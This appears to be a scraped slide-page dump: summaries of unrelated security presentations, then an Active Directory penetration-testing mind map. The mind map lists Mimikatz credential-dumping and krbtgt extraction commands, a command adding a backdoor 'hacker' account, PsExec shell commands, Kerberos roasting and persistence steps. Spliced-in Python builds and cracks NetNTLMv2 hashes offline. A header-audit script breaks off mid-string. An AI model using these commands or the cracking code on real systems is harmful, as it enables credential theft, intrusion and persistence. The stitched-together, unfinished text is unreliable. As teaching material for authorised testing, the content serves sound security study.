The document provides an overview of penetration testing techniques and strategies. It discusses initial reconnaissance activities like scanning and enumeration. It then covers exploitation, maintaining access, and post-exploitation tactics like credential dumping, privilege escalation, and pivoting. Defense strategies are also mentioned such as disabling unnecessary services, requiring strong passwords, and limiting local administrator rights.
This document has been prepared to help develop a good penetration testing and vulnerability assessment lab. It covers hardware requirements, manual and automated software requirements, and approaches for performing penetration testing.
Further, this document is designed to build a penetration test lab that simulates vulnerabilities in a testing environment and to execute vulnerability assessment and penetration testing from that lab, providing a static IP to the client so that the test is verifiably performed from a valid/legitimate link.
FortiWeb is a web application firewall that provides three key layers of protection:
1) Anomaly detection using machine learning to identify abnormal traffic patterns without blocking benign anomalies.
2) Threat detection using pattern analysis and FortiGuard threat models to block known attacks.
3) Virtual patching to block exploits of known vulnerabilities in applications until they can be fully patched.
FortiWeb integrates with the Fortinet Security Fabric to provide broader visibility, protection, detection, and response for web applications and the digital attack surface.
The document provides an overview of the Open Web Application Security Project (OWASP). It discusses what OWASP is, the free resources it provides like publications, tools, and local chapters. It outlines some of OWASP's major publications like the OWASP Top 10 and Testing Guide. It also demonstrates the WebScarab and WebGoat tools. Finally, it describes the goals and offerings of the OWASP Cincinnati local chapter.
1) Spring Security provides authentication and authorization services for Java-based applications. It supports various authentication types including form-based, LDAP, and certificates.
2) Core concepts include the UserDetails interface for user information, UserDetailsService for retrieving user details, and the SecurityContext for holding authentication details.
3) Spring Security configuration is done primarily through the security namespace, defining things like the authentication manager, secured URLs, and form login details.
4) Method-level security and JSP tag libraries allow securing controller methods and restricting JSP content.
This document provides an overview of the OWASP Testing Guide for vulnerability assessment and penetration testing (VAPT). It defines key terms like vulnerability, threat, control, and vulnerability assessment. It explains the security principles of confidentiality, integrity, and availability (CIA). It then describes common sources of vulnerabilities and outlines various testing methodologies for information gathering, configuration management, identity and authentication, authorization, session management, input validation, error handling, cryptography, and client-side testing. It stresses the importance of customizing the testing plan for different application types and remembering best practices like following protocols, capturing accurate details of the tested systems, informing clients, and filtering false positives.
The document provides an overview of web application firewalls (WAFs) and the FortiWeb WAF product. It describes how WAFs protect web applications from code-based attacks like SQL injection and cross-site scripting. It outlines the key features of FortiWeb, including its ability to understand normal traffic patterns and block anomalies. The document also discusses emerging trends in the WAF market and how FortiWeb addresses needs like PCI compliance. It provides details on the FortiWeb product line and summarizes how it provides protection at multiple layers for web applications and servers.
The document discusses F5 Networks solutions for application delivery networking, including an overview of the F5 ADN and how it provides application acceleration, load balancing, security and other capabilities. Use cases are presented showing how the F5 ADN improves performance and user experience. Professional services and resources from F5 are also mentioned.
Nikto is a free and open source web server scanner used to identify vulnerabilities and help secure servers. It tests servers for over 6,500 dangerous files and scripts, outdated versions of software, and misconfigurations. Nikto scans target servers and outputs results that can help identify security problems. It has advantages like being fast, versatile, and open source, while its only disadvantage is needing to run via the command line.
Kali Linux is a Debian-based Linux distribution designed for penetration testing and security auditing. It includes over 500 security tools categorized under information gathering, vulnerability analysis, password attacks, wireless attacks, exploitation tools, maintaining access, and more. These tools are maintained by Offensive Security and aimed to help security professionals with tasks like scanning, penetration testing, forensics, and reverse engineering.
This document discusses using the OWASP Zed Attack Proxy (ZAP) tool to find vulnerabilities in web applications. ZAP is a free and open-source web application penetration testing tool that can be used to conduct both automated and manual testing of applications. The document provides an overview of ZAP's features, how to install and configure it, how to test applications for vulnerabilities using both automated and direct methods, and how to integrate ZAP with other tools.
Burp Suite is a Java-based tool for testing the security of web applications. It has free and paid versions. The tool's modules include Target, Proxy, Spider, Scanner, Intruder, Repeater, Sequencer, Decoder, Comparer, and Extender. The Target module provides an overview of the application. The Proxy module intercepts and inspects traffic between the browser and server. The Spider module automatically crawls the application. The Scanner module automatically scans for vulnerabilities. The Intruder module automates customized attacks. The Repeater module manually manipulates and reissues requests.
Beginner level presentation on Malware Identification as part of the Malware Reverse Engineering course. Learn what malware is, how it functions, how it can be detected, identified and isolated for reverse engineering. For more information about malware detection and removal visit https://www.intertel.co.za
SOC and SIEM systems can help organizations detect and respond to security incidents and threats in a timely manner. A SOC acts as a security operations center to monitor, analyze, and respond to cybersecurity incidents. SIEM provides real-time analysis of security alerts and events to help identify potential threats. Implementing SOC and SIEM solutions can improve an organization's security posture through early threat detection, compliance with regulations, and reduced breach impact.
The document provides information on OWASP ZAP, a free and open source web application security testing tool. It discusses what ZAP is, why it is a good choice for security testing, its key features which include an intercepting proxy, scanners, spiders, and fuzzing. It then describes how to launch and use ZAP, covering its graphical user interface, attacking websites by spidering, scanning and reviewing alerts. Key terms like session and context are also explained. Steps to run a scan are outlined, including crawling the site, creating a session and context, attacking with spider and active scans, and reviewing scan results. Finally, the difference between active and passive scans is summarized.
SOC presentation - Building a Security Operations Center (Michael Nickle)
Presentation I used to give on the topic of using a SIM/SIEM to unify the information stream flowing into the SOC. This piece of collateral was used to help close the largest SIEM deal (Product and services) that my employer achieved with this product line.
This document discusses network security and penetration testing. It provides an overview of creating a networking lab and the tools used, including Cisco Packet Tracer, Backtrack, Metasploit, and Wireshark. The document then covers network security topics like common network threats, router security, switch security, and port security. It defines penetration testing and explains its goals of finding vulnerabilities and recommending improvements. The phases of penetration testing are outlined as profiling, enumeration, vulnerability analysis, exploitation, and reporting. Different styles of penetration testing like blue team and red team are also summarized.
OWASP Top 10 2021 Presentation (Jul 2022), by Tzahi Arabov
The document provides information about the OWASP Top 10 2021 list of web application security risks. It describes the top risk, A01: Broken Access Control, giving its definition, examples of vulnerabilities it can enable, prevention methods, and examples. It also summarizes the second and third top risks, A02: Cryptographic Failures and A03: Injection, in a similar manner.
DCSF19 Container Security: Theory & Practice at Netflix (Docker, Inc.)
Michael Wardrop, Netflix
Usage of containers has undergone rapid growth at Netflix and it is still accelerating. Our container story started organically with developers downloading Docker and using it to improve their developer experience. The first production workloads were simple batch jobs, pioneering micro-services followed, then status as a first class platform running critical workloads.
As the types of workloads changed and their importance increased, the security of our container ecosystem needed to evolve and adapt. This session will cover some security theory, architecture, along with practical considerations, and lessons we learnt along the way.
CVE-2021-44228 Log4j (and Log4Shell) Executive Explainer by cje@bugcrowd (Casey Ellis)
This deck goes through what Log4j is from ground-level concepts up, explains how Log4j works, how it is vulnerable, how the Log4shell exploit works, how to mitigate the risk and defend against exploitation, and some current observations through the Bugcrowd platform and predictions about what happens next.
Burp Suite is a Java based software platform of tools for performing security testing of web applications. The suite of products can be used to combine automated and manual testing techniques and consists of a number of different tools, such as a proxy server, a web spider, scanner, intruder, repeater, sequencer, decoder, collaborator and extender.
Static Analysis Security Testing for Dummies... and You (Kevin Fealey)
Most enterprise application security teams have at least one Static Analysis Security Testing (SAST) tool in their tool-belt; but for many, the tool never leaves the belt. SAST tools have gotten a reputation for being slow, error-prone, and difficult to use; and out of the box, many of them are – but with a little more knowledge behind how these tools are designed, a SAST tool can be a valuable part of any security program.
In this talk, we'll help you understand the strengths and weaknesses of SAST tools by illustrating how they trace your code for vulnerabilities. You'll see out-of-the-box rules for commercial and open-source SAST tools, and learn how to write custom rules for the widely-used open source SAST tool, PMD. We'll explain the value of customizing tools for your organization, and you'll learn how to integrate SAST technologies into your existing build and deployment pipelines. Lastly, we'll describe many of the common challenges organizations face when deploying a new security tool to security or development teams, as well as some helpful hints to resolve these issues.
A technical demo presentation showing an Evil Twin attack in action. The demo shows the attack from the victim, attacker, and evil twin perspectives. Background information is available. Full report is available at http://www.ericgoldman.name
Ethical Hacking n VAPT presentation by Suvrat Jain (Suvrat Jain)
A perfect example of a 6-week summer training PPT. Course: Ethical Hacking, its info and VAPT (Vulnerability Assessment and Penetration Testing); about vulnerability scanning, tools used, password cracking, etc.
CNIT 124 Ch 13: Post Exploitation (Part 1), by Sam Bowne
Slides for a college course in "Advanced Ethical Hacking" at CCSF. Instructor: Sam Bowne
Course Web page:
https://samsclass.info/124/124_F17.shtml
Based on "Penetration Testing: A Hands-On Introduction to Hacking" by Georgia Weidman -- ISBN-10: 1593275641, No Starch Press; 1st edition (June 8, 2014)
Security testing is deemed successful when the following attributes of an application are intact:
- Authentication
- Authorization
- Availability
- Confidentiality
- Integrity
- Non-Repudiation
Testing must start early to minimize defects and cost of quality. Security testing must start right from the Requirements Gathering phase to make sure that the quality of end-product is high.
This is to ensure that any intentional/unintentional unforeseen action does not halt or delay the system.
This document discusses techniques for enumerating information from Active Directory. It begins with an introduction and overview of the domain being targeted, CAPSULE.CORP. The agenda covers local privileges enumeration using MS-RPC to find local admin accounts, logon and session enumeration to detect where users are logged in from, and LDAP enumeration to discover objects and relationships. The document provides details on tools like PowerView that can be used to remotely enumerate SAM databases, network sessions, and query LDAP. It discusses attributes and groups of interest for users, computers, and privileges like delegation.
The document provides an outline for hacking different systems including performing internet footprinting, hacking Windows systems, hacking Unix/Linux systems, and hacking networks. It discusses techniques for scanning systems, enumerating services and users, penetrating targets by exploiting services or escalating privileges, gaining interactive access, and maintaining influence. It provides examples of tools that can be used for reconnaissance, attacks, and privilege escalation on the different system types. The document also covers vulnerabilities in systems like SNMP, HTTP, TFTP, and routing protocols that can be exploited, and techniques for dealing with firewalls like port scanning and redirection.
This document provides an overview and schedule for a training on active deception techniques for red and blue teams. It covers topics like external reconnaissance, privilege escalation, and lateral movement. Deception strategies are discussed for each topic to detect adversarial activities like DNS reconnaissance, exploiting unattend files, or cloning webpages. The training will include hands-on exercises and visualizations in Kibana to detect engagement with deception assets.
The document discusses various methods for hardening Linux security, including securing physical and remote access, addressing top vulnerabilities like weak passwords and open ports, implementing security policies, setting BIOS passwords, password protecting GRUB, choosing strong passwords, securing the root account, disabling console programs, using TCP wrappers, protecting against SYN floods, configuring SSH securely, hardening sysctl.conf settings, leveraging open source tools like Mod_Dosevasive, Fail2ban, Shorewall, and implementing security at the policy level with Shorewall.
Low Hanging Fruit: Making Your Basic MongoDB Installation More Secure (MongoDB)
Your MongoDB Community Edition database can probably be a lot more secure than it is today, since Community Edition provides a wide range of capabilities for securing your system, and you are probably not using them all. If you are worried about cyber-threats, take action to reduce your anxiety!
This document discusses securing Windows networks. It begins with discussing hacker personas and common security mistakes made. It then covers securing Windows networks by discussing system administrator personas, threats like password attacks and remote code execution vulnerabilities, and countermeasures. It also discusses the Microsoft Secure Windows Initiative and staying secure through awareness, vulnerability assessment, and responding to security events. The focus is on implementing security through practices like strong passwords, keeping systems patched, and using tools like the Microsoft Baseline Security Analyzer.
The document discusses various techniques for hacking systems, including password cracking, privilege escalation, executing applications remotely, and using keyloggers and spyware. It provides an overview of tools that can perform functions like password cracking, sniffing network traffic, capturing credentials, escalating privileges, executing code remotely, and logging keystrokes covertly. Countermeasures to these techniques, like disabling LM hashes, changing passwords regularly, and using antivirus software, are also covered.
This document provides instructions for installing and configuring an LDAP server and phpLDAPadmin on a CentOS system. The key steps include:
1. Installing LDAP server software and configuring the slapd.conf file.
2. Initializing the LDAP directory with a root user and organizational units.
3. Installing and configuring phpLDAPadmin to manage the LDAP server over a web interface.
This document provides instructions for installing and configuring an LDAP server plus phpLDAPadmin on a CentOS system. The key steps include:
1. Installing LDAP server packages and configuring slapd.conf and the LDAP database.
2. Initializing the LDAP directory with a root user and organizational units.
3. Installing a web server and phpLDAPadmin to provide a web interface for managing the LDAP server.
4. Configuring phpLDAPadmin to connect to the LDAP server by editing its config.php file.
Author: Jameel Nabbo
Company: UITSEC
This guide contains practical, hands-on Linux privilege escalation techniques and methods, based on real penetration testing experience.
As shown by headlines and countless intrusions, even moderately skilled attackers can sail through the defenses of a typical corporate network. Using a playbook of techniques both common and uncommon, intruders can bypass almost all security barriers despite even tough policies on end users and admins. But failure is not inevitable for a defender. There are many practical ways a network can be constructed that will wipe out most of the playbook, and they don’t always require expensive purchases.
Security must be built from the start, and this presentation will show you how it’s done; how to intelligently look at threats and plan defenses for a Windows network.
The document outlines strategies for securing a network from intrusion and exploitation. It discusses how typical networks are easily compromised and provides recommendations across three key areas: network defenses, host defenses, and preventing exploits. Specific controls are proposed such as air gapping systems where possible, whitelisting applications and traffic, using smart cards for authentication instead of passwords, virtual machine isolation, and proactively patching and updating systems.
Null Bhopal Sep 2016: What it Takes to Secure a Web Application (Anant Shrivastava)
This document provides guidance on securing a web application hosted on a virtual private server (VPS). It discusses selecting secure software like Linux, Nginx, PHP and MySQL. It recommends hosting on a VPS for control over security. Key areas covered include hardening the operating system, configuring the web server, application and database securely, enabling HTTPS, securing remote access via SSH, using a firewall and fail2ban. It also discusses securing backups, accounts with the host and administrator laptop. The document aims to be comprehensive in addressing security at each layer for the web application.
InSecure Remote Operations - NullCon 2023 by Yossi Sassi (Yossi Sassi)
- The document discusses remote operations and credential exposure during remote management. It highlights the use of various living off the land techniques like RPC, WMI, PSRemoting and RDP.
- It provides tips for preventing lateral movement without dedicated security products by leveraging configurations like LogonWorkstations to restrict where accounts can logon.
- The key takeaways are to embrace a living off the land mindset, be aware of credential exposure risks during remote operations, and that single configurations can be effective for preventing issues like lateral movement when properly configured and monitored.
The document summarizes security advice for securing Windows networks. It discusses revealing hacker personas including automated attacks, targeted attacks, and the different skill levels of hackers from lame to sophisticated. It then discusses top security mistakes made and demonstrates how to secure Windows networks using features in Windows Server 2003 like group policy templates. Security improvements in Windows XP Service Pack 2 are also summarized, including network protection technologies like Windows Firewall and memory protection with Data Execution Prevention.
Neville Varnham discusses various cyber security threats related to PeopleSoft systems. He notes that ransomware schemes now allow technically illiterate criminals to conduct cyber attacks. Password cracking software can crack simple passwords in under a minute. The document also discusses a past university data breach involving PeopleSoft after a student was able to access a database with Social Security numbers. Varnham provides an overview of steps organizations can take to harden their PeopleSoft security, such as enabling encryption, implementing password policies, and ensuring proper logging and auditing.
MongoDB World 2019: Tutorial: A Journey to Magical Security Creatures' Land (MongoDB)
The interactive presentation will use a metaphor, comparing security features to magical creatures, in that they both must be treated right. This game-based learning session will help audiences to understand the security features MongoDB has to offer and how to use them correctly.
Carlos García - Pentesting Active Directory [rooted2018] (RootedCON)
An introduction to intrusion testing in Microsoft Active Directory environments, delivered as a practical talk for auditors and for anyone interested in pentesting corporate environments. It opens with a brief introduction to the Active Directory directory service and its most security-critical components. It then explains the main differences from a classic infrastructure pentest, as well as the most common techniques and attacks used to carry out the exercise and fully compromise the corporate domain. Prerequisites: attendees should have basic knowledge of Active Directory and basic-to-intermediate knowledge of pentesting or ethical hacking, preferably of infrastructure and/or operating systems.
Penetration Testing
Scanning &
Enumeration
Exploitation
Reconnaissance
Scanning
Nmap
Netdiscover
arp-scan
Active Directory
Brute Force Attacks
Email Address Gathering
Identify Target
Hunter.io (Domain Search)
bugcrowd.com
Maintaining Access
Persistence Scripts
Scheduled Tasks
Add a user
Enumeration
HTTP/HTTPS
SMB
SSH
Credential Stuffing
Post-Exploitation
Pivoting
Covering Tracks
Make the System/Network as
it was when you entered it
Remove executables, scripts, and added files
Remove malware, rootkits, and added user accounts
Set settings back to original configurations
Breached Credentials
OSINT
Subdomains
Sublist3r
crt.sh
OWASP Amass
Identify Website
Technologies
Information Gathering with Burp Suite
Google Fu
Social Media
Overview
Target Validation
Finding Subdomains
Fingerprinting
Data Breaches
WHOIS
nslookup
dnsrecon
Google Fu
dig
Nmap
Sublist3r
Bluto
crt.sh
Nmap
Wappalyzer
WhatWeb
BuiltWith
Netcat
HaveIbeenPwned
Breach-Parse
WeLeakInfo
Breach-Parse
Tomnomnom HTTPprobe
BuiltWith
Wappalyzer
whatweb
LinkedIn
Twitter
The Harvester
Masscan
Metasploit
Nessus
Nikto
Dirbuster
Dirb
Gobuster
Source Code
Burp Suite
Msfconsole - smb_version
smbclient
enum4linux (not working properly)
Connection attempt
Vulnerability Research
Google
Searchsploit
Exploit Database
Metasploit - search
Password Spraying
Metasploit
Hydra
Hashes Dumping / Cracking
SAM
SAM
SECURITY
SYSTEM
secretsdump
John
Hashcat
crackmapexec
psexec
Pass-The-Hash
Pass-The-Hash
Eternal Blue
MS17_010
Metasploit smb_ms17_010
AutoBlue alternative to metasploit
smbclient
Credentials
Kiwi
Metasploit
Mimikatz
Tokens
Stealing &
Manipulation
Metasploit Incognito
FTP
Password dumping
Hash dumping
Golden Tickets
Password dumping in memory
Password dumping
Password dumping in memory
Hash dumping
Golden Tickets
Default Creds Common Bad Password List
Word List Generator
CEWL
Buffer Overflow
Spiking
Fuzzing
Finding the Offset
Overwriting the EIP
Finding Bad Characters
Finding the Right Module
Generating Shellcode / Getting Root
LLMNR Poisoning
Capturing NTLMv2 Hashes
Password Cracking (Hashcat)
Defences
SMB Relay Attacks
Host Discovery
SMB Signing Disabled
Disable LLMNR and NBT-NS
Require Network Access Control
Require Strong User Passwords
LLMNR
NBT-NS
DNS/MDNS
Responder
Responder
Nessus
Gain Shell Access
Responder
ntlmrelayx
Nmap script (smb2-security-mode)
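The LLMNR poisoning branch above (Responder captures NetNTLMv2, hashcat cracks it) and the "Cannot pass NTLMv2" node further down both come from how the NetNTLMv2 response is built. The following Python is an added illustration for this cheat sheet, not Responder, hashcat, Impacket or any TCM Security code: it derives the NT hash, builds an NTLMv2 response from MS-NLMP's definitions, cracks it offline against a small candidate list, and shows that the same NT hash gives a different response once the server challenge changes. That is why a captured response is only useful for offline cracking or live relay, while the NT hash itself can be used directly (pass-the-hash, "no cracking needed"). The user, domain, password, server challenge and client blob are constructed test values; MD4 is written out because many OpenSSL builds no longer expose it through hashlib.

```python
"""NetNTLMv2: build, crack offline, and show it is bound to the server challenge.
Added example for this cheat sheet; all inputs below are constructed test data."""
import hmac
import struct


def _md4(data: bytes) -> bytes:
    """RFC 1320 MD4; needed for the NT hash (MD4 of the UTF-16LE password)."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):                              # round 1
            a, b, c, d = d, rotl((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                              # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rotl((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                              # round 3
            a, b, c, d = d, rotl((a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4]), b, c
        A, B, C, D = (A + a) & 0xFFFFFFFF, (B + b) & 0xFFFFFFFF, (C + c) & 0xFFFFFFFF, (D + d) & 0xFFFFFFFF
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); this is what secretsdump/SAM dumps give you."""
    return _md4(password.encode("utf-16-le"))


def ntowf_v2(nt: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) || domain) over UTF-16LE (MS-NLMP 3.3.2)."""
    return hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), "md5").digest()


def netntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || temp). Only the NT hash is
    needed, never the password: that is the whole basis of pass-the-hash."""
    return hmac.new(ntowf_v2(nt, user, domain), server_challenge + blob, "md5").digest()


def crack_netntlmv2(user, domain, server_challenge, blob, nt_proof, candidates):
    """Offline crack: recompute the proof for each candidate password (what hashcat -m 5600 does)."""
    for cand in candidates:
        if hmac.compare_digest(netntlmv2_response(nt_hash(cand), user, domain, server_challenge, blob), nt_proof):
            return cand
    return None


# Constructed test values (not captured from any real host).
USER, DOMAIN, PASSWORD = "jdoe", "MARVEL", "Password1!"
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
# Shape of the NTLMv2_CLIENT_CHALLENGE "temp" blob (type bytes, timestamp, client
# challenge, reserved), AV pairs omitted; only its bytes matter for the HMAC.
BLOB = bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 4


def demo():
    """Returns (hashcat -m 5600 line, cracked password, response changed with new challenge)."""
    nt = nt_hash(PASSWORD)
    proof = netntlmv2_response(nt, USER, DOMAIN, SERVER_CHALLENGE, BLOB)
    line = f"{USER}::{DOMAIN}:{SERVER_CHALLENGE.hex()}:{proof.hex()}:{BLOB.hex()}"
    cracked = crack_netntlmv2(USER, DOMAIN, SERVER_CHALLENGE, BLOB, proof, ["summer2023", "Password1!", "welcome1"])
    # A different server challenge with the same NT hash gives a different proof, so
    # a captured response cannot be replayed to another server later.
    replayed = netntlmv2_response(nt, USER, DOMAIN, bytes.fromhex("8877665544332211"), BLOB)
    return line, cracked, replayed != proof


if __name__ == "__main__":
    print(demo())
```

The `line` returned by `demo()` has the `user::domain:challenge:NTProofStr:blob` layout Responder writes and hashcat mode 5600 reads. Relay (ntlmrelayx) works only because the response is forwarded while the server challenge is still live, which is exactly what SMB signing breaks.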
Privilege Escalation
anonymous access
binary
Network
ipconfig /all
arp -a
route print
netstat -ano
Davtest
Test Server upload
WEB
Web Applications
Finding Subdomains
Find Alive Domains
SQL Injection
XSS
https://github.com/danielmiessler/SecLists
https://github.com/initstring/passphrase-wordlist
SAM Hashes Dump
Interactive shell -i
Command execute -c
Execute .exe file -e
Crack offline
Pass-the-Hash
HTTP Off
SMB Off
msfvenom
Reverse shell
Netcat
Powershell
msf web_delivery
other
meterpreter
Defences
Enable SMB signing on all devices
Disable NTLM Authentication
Account tiering
It will completely stop the attack
Performance issues with file copy
Stops the attack
If Kerberos stops working, back to NTLM
Admin only logging into their accounts / servers / domain controllers
Local admin restriction: no local admin prevents lateral movement
msfconsole
psexec.py
smbexec.py
wmiexec.py
exploit/windows/smb/psexec
exploit/windows/smb/psexec_psh
AV noisy
Less noisy / Half-shell
Less noisy / Half-shell
IPv6 Attacks
LDAP Relay
mitm6
ntlmrelayx
aclpwn restore
info dump (loot folder)
new user creation on DC
delegate access
Defenses
Other Attack Vectors and Strategies
Disable IPv6
Disable wpad if not in use
Enable LDAP signing and channel binding
Put admin users into the protected users group
Possible unwanted side effects Define Block Rules / instead of Allow Rules
usually not enabled
prevent impersonation or delegation
Day begins with
Early morning
Lunch time
mitm6
Responder
Early morning
Lunch time
Easy win
See how the network responds
Are they giving us hashes ?
Are those hashes easy to crack ?
Easy win
If LLMNR is disabled
might have had Pentest before
might know common attacks
Nessus scan
Nmap scan
HTTP_Version (Metasploit)
Use this if scans are taking too long
Sweep entire network for websites
Less likely to be picked-up
Look at logins; check for default creds
Look for printers; might get domain admin off them
Scan-to-computer feature
Is the user domain admin on that printer?
Dump creds in clear text; get passwords for the SMB user
Using individual user accounts
Lots of people don't secure their printers
Jenkins Instances Often wide open
Check for Vulns
Looking for hashes
Get loot back
Get account created on Domain Controller
Try all possible ways in
Look for SMB open / signing disabled
Pickup targets / hashes for SMB Relay attacks
Morning
Afternoon Relay hashes
Search for low hanging fruits
Think outside the box
Enumerate as much as you can
Don't just focus on the exploit
Initial Attack Vectors
Post-Compromise
Attack
Enumeration
PowerView
Bloodhound
Pass-the-Hash
Pass-the-Password
Dump the Hashes
crackmapexec
Pwn3d!
crackmapexec
Metasploit psexec meterpreter hashdump
no cracking needed
secretsdump
Crack NTLM Hashes Hashcat
SAM Dumping
get a shell
not Pwn3d!
Try get a shell with Psexec
Dump local SAM hashes
no SMB access
Pwn3d! or green [+] Try to authenticate with Psexec
not Pwn3d! no SMB access
LSA Secrets Dumping
DPAPI_SYSTEM KEY
Pass Attack
Limit account re-use
Utilize strong passwords
Privilege Access Management (PAM)
Avoid re-using local admin password
Disable Guest and Administrator accounts
Limit who is a local administrator
The longer the better (>14 characters)
Avoid using common words
I like long sentences
Check out/in sensitive accounts when needed
Automatically rotate passwords on check out and check in
Limits pass attacks as hash/password is strong and constantly rotated
Mitigation
Token Impersonation
Token Impersonation
Cannot pass NTLMv2
Mimikatz
Meterpreter - Incognito
Limit user/group token creation permissions
Account tiering
Local admin restriction
Kerberoasting
GPP / cPassword
Mimikatz
Kerberoasting
Strong Passwords
Least privilege
Request TGT, provide NTLM hash
Receive TGT encrypted with krbtgt hash
Request TGS for Server (Presents TGT)
Receive TGS encrypted with Server's account hash
Crack the hash
GetUserSPNs.py
smb_enum_gpp module in Metasploit
gpp_decrypt
Groups.xml
Invoke-GPP
smbclient
prompt off
recurse on
mget *
cpassword
Golden Ticket
Credential Dumping
Pass-the-Hash
Over-Pass-the-Hash
Pass-the-Ticket
Silver Ticket
privilege::debug
LSA dump
sekurlsa::logonpasswords
ntds.dit
Usernames
NTLM
Logged in accounts
wdigest
lsadump::sam
lsadump::sam /patch
lsadump::lsa /patch
SAM dump
sam dump not working
shell with Metasploit
secretsdump.py
just download the SAM
Passwords
Why do we dump ?
Crack passwords offline
Golden Ticket attack
% we are able to crack
weak password policy
strong password policy
Kerberos Ticket Granting Ticket
crackmapexec
crack with secretsdump.py
windows/system32/config/SAM
windows/system32/config/SECURITY
windows/system32/config/SYSTEM
Pull down krbtgt account
SID
NTLM
lsadump::lsa /inject /name:krbtgt
Golden Ticket
Pass-the-Ticket
Silver Ticket
opens cmd prompt
Access any computer
dir \\THEPUNISHER\c$
PsExec64.exe -accepteula \\THEPUNISHER cmd.exe
shell
psexec.exe
misc::cmd
Stealthier
Features
Persistence
net user hacker password123 /add
run scheduleme
run schtaskabuse
run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence
Metasploit
proxychains
SSH Pivoting
psexec
run autoroute -s 169.254.0.0/24
run autoroute -p
connect to target
route print
ipconfig
arp -a
use auxiliary/scanner/portscan/tcp
poc
Wi-Fi
WPA2 PSK
WPA2 Enterprise
Assetfinder
Amass
./run.sh tesla.com
HTTProbe
Screenshot Websites
GoWitness
Subdomain takeover
Subjack
Scraping Wayback data
Waybackurls
Enumeration
Users Enumeration
nmap --script=smb-enum-users.nse
GetADUsers.py -dc-ip 10.10.10.161 htb.local/
kerbrute userenum --dc 10.10.222.155 -d spookysec.local usernames.txt -t 100
Attempt to list and get TGTs for those users that have the property "Do not require Kerberos preauthentication" set (UF_DONT_REQUIRE_PREAUTH)
GetNPUsers.py -dc-ip 10.10.10.161 htb.local/
Get TGT hash, for those users with such configuration GetNPUsers.py -request -dc-ip 10.10.10.161 htb.local/
Hashcat
John the Ripper
Get a shell
Evil-winrm
psexec
Brute force discovery of users, passwords and password spray
Kerbrute
Metasploit auxiliary/gather/kerberos_enumusers
Exploiting Kerberos GetNPUsers.py
ASREPRoasting
Get Hashes
Shares Enum smbclient
Crack the hashes
Elevate Privileges Secretsdump
NTDS.DIT
secrets dump
Pass-the-Hash
psexec
evil-winrm
Get system shell
Easy-win Strategy
crackmapexec check where you can authenticate
Abuse WriteDACL permissions
ntlmrelayx
PowerView
SQL Injection
Broken Authentication
Cross-Site Scripting (XSS)
XML External Entities (XXE)
Security Misconfiguration
OWASP Top Ten
Sensitive Data Exposure
Broken Access Control
Insecure Deserialization
Using Components with Known Vulnerabilities
Insufficient Logging & Monitoring
dirbuster
BurpSuite
nmap
Search for 'key' 'keys' 'password' 'passw'
Response tab navigate all directories
Response Headers
HTTP Strict Transport Security (HSTS)
https://securityheaders.com
nmap --script=ssl-enum-ciphers -p 443 tesla.com
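The "Response Headers" and HSTS nodes above are checked by pasting a response into securityheaders.com; the same checks can be run locally on a response copied out of Burp. The following Python is an added example written for this cheat sheet (it is not securityheaders.com's logic or any tool from the page): it parses a raw HTTP response head and reports the missing or weak headers. The two sample responses are constructed; the 31536000-second HSTS threshold is the one-year minimum the HSTS preload list requires.

```python
"""Audit security response headers from a raw HTTP response head.
Added example for this cheat sheet; the sample responses are constructed."""
import re

HSTS_MIN_AGE = 31536000  # one year, the preload-list minimum


def parse_headers(raw: str) -> dict:
    """Return {lower-cased name: value} for the headers of a raw response (status line dropped)."""
    head = raw.split("\r\n\r\n", 1)[0]
    hdrs = {}
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name:
            hdrs[name.strip().lower()] = value.strip()
    return hdrs


def audit_headers(raw: str) -> list:
    """List of findings; empty list means every check passed."""
    h = parse_headers(raw)
    findings = []
    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("HSTS missing")
    else:
        m = re.search(r"max-age=(\d+)", hsts, re.I)
        age = int(m.group(1)) if m else 0
        if age < HSTS_MIN_AGE:
            findings.append(f"HSTS max-age too short ({age}s, want >= {HSTS_MIN_AGE})")
        if "includesubdomains" not in hsts.lower():
            findings.append("HSTS without includeSubDomains")
    csp = h.get("content-security-policy", "")
    if not csp:
        findings.append("CSP missing")
    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing")
    if "x-frame-options" not in h and "frame-ancestors" not in csp.lower():
        findings.append("clickjacking: no X-Frame-Options / CSP frame-ancestors")
    for leak in ("server", "x-powered-by"):   # version strings feed searchsploit for free
        if re.search(r"\d", h.get(leak, "")):
            findings.append(f"{leak} header reveals a version: {h[leak]}")
    return findings


# Constructed sample responses, as they would appear in Burp's Response tab.
WEAK = ("HTTP/1.1 200 OK\r\n"
        "Server: Apache/2.4.29 (Ubuntu)\r\n"
        "X-Powered-By: PHP/7.2.24\r\n"
        "Strict-Transport-Security: max-age=300\r\n"
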